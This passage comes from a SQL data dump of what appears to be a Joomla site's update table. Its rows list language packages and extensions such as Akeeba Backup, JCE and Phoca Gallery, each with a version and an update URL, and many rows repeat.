CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29971,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29972,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29973,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29974,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29975,57,0,'German CH','','pkg_de-CH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29976,57,0,'German AT','','pkg_de-AT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29977,57,0,'German LI','','pkg_de-LI','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29978,57,0,'German LU','','pkg_de-LU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29979,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29980,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29981,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'9.0.0','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(29982,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.8','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-8			\n		',''),(29983,129,0,'JCE 2.9.11','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.11','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-11-released',''),(29984,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(29985,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29986,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-9.html',''),(29987,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29988,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29989,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29990,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29991,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29992,3,0,'French','','pkg_fr-FR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29993,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.0.2','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29994,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29995,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29996,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29997,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29998,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29999,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30000,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30001,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(30002,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(30003,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(30004,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30005,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30006,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30007,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30008,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30009,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30010,3,0,'Persian','','pkg_fa-IR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(30011,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30012,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30013,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(30014,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30015,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(30016,3,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30017,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30018,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30019,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(30020,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(30021,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(30022,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30023,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30024,3,0,'German DE','','pkg_de-DE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30025,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30026,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(30027,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30028,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30029,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(30030,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(30031,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(30032,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(30033,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(30034,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(30035,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30036,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30037,3,0,'German CH','','pkg_de-CH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30038,3,0,'German AT','','pkg_de-AT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30039,3,0,'German LI','','pkg_de-LI','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30040,3,0,'German LU','','pkg_de-LU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30041,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30042,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(30043,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com:80/joomla/138/b61e70db','',''),(30044,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com:80/joomla/138/2084920890','',''),(30045,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com:80/joomla/286/21ffe006','',''),(30046,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com:80/joomla/286/326466299','',''),(30047,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com:80/joomla/287/cb577720','',''),(30048,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com:80/joomla/301/dfc993d8','',''),(30049,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com:80/joomla/302/2df8a4e2','',''),(30050,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com:80/joomla/313/1985305838','',''),(30051,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com:80/joomla/313/1307741342','',''),(30052,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com:80/joomla/313/1301311221','',''),(30053,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com:80/joomla/381/337128173','',''),(30054,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com:80/joomla/559/1033ef39','',''),(30055,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(30056,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30057,57,0,'French','','pkg_fr-FR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(30058,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.0.2','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30059,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30060,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(30061,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(30062,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30063,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(30064,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(30065,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(30066,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(30067,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(30068,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(30069,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(30070,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(30071,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30072,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(30073,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(30074,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(30075,57,0,'Persian','','pkg_fa-IR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(30076,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(30077,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(30078,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(30079,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(30080,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(30081,57,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(30082,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(30083,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(30084,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(30085,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(30086,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(30087,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(30088,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(30089,57,0,'German DE','','pkg_de-DE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(30090,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(30091,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(30092,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(30093,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(30094,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(30095,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(30096,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(30097,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(30098,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(30099,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(30100,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(30101,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(30102,57,0,'German CH','','pkg_de-CH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(30103,57,0,'German AT','','pkg_de-AT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(30104,57,0,'German LI','','pkg_de-LI','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(30105,57,0,'German LU','','pkg_de-LU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(30106,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(30107,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(30108,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30109,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'9.0.0','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(30110,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.8','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-8			\n		',''),(30111,129,0,'JCE 2.9.11','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.11','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-11-released',''),(30113,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(30114,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30115,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30116,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30117,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30118,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30119,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30120,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30121,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30122,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30123,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30124,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30125,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30126,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30127,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30128,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30129,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30130,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30131,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30132,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30133,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30134,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30135,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30136,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30137,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30138,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30139,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30140,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30141,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30142,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30143,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30144,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30145,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30146,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30147,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30148,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30149,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30150,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30151,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30152,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30153,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30154,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30155,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30156,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30157,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30158,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30159,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30160,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30161,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30162,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30163,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30164,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30165,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30166,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30167,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30168,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30169,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30170,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30171,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30172,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30173,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30174,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30175,1,0,'Joomla','','joomla','file','',0,'3.10.1','','https://update.joomla.org/core/extension.xml','',''),(30176,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.10','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-10.html',''),(30177,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(30178,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(30179,3,0,'French','','pkg_fr-FR','package','',0,'3.10.1.4','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(30180,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(30181,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(30182,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(30183,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.1.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(30184,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(30185,3,0,'Arabic 